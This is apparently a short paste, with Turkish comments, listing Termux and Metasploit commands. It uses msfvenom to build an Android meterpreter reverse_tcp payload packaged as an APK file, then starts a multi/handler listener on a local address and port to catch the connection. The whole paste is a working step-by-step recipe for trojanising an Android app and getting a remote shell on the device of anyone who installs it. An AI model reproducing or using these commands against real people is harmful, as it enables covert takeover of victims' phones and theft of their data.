Facebook
From Whipped Leech, 3 Years ago, written in Plain Text.
This paste is a reply to TERMUX-METASPLOİT KOMUTLARI from cyberportal - view diff
Embed
Download Paste or View Raw
Hits: 261
  1. - ifconfig (local hostu öğrenmek için)
  2. - msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 R > /sdcard/test.apk (Payload oluşturma)
  3. - msfconsole (metasploiti çalıştırmak için)
  4. - use exploit/multi/handler
  5. - set payload android/meterpreter/reverse_tcp
  6. - set lhost 192.168.1.6
  7. - set lport 4444
  8. - run